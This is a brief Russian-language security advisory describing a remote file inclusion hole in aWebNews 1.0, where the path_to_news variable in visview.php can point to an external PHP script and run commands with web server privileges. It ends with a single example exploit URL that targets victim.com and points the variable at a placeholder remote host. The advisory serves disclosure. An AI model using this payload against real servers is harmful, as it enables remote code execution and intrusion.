Программа: aWebNews 1.0

Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе с привилегиями
web севера. Уязвимость существует из-за
недостаточной обработки входных данных в
переменной path_to_news сценария visview.php.
Удаленный пользователь может указать в
качестве значения уязвимой переменной
внешний php сценарий и выполнить
произвольные команды на системе с
привилегиями webсервера.

Пример:

http://victim.com/aWebNews/visview.php?path_to_news=http://xxxxxx



Оставить мнение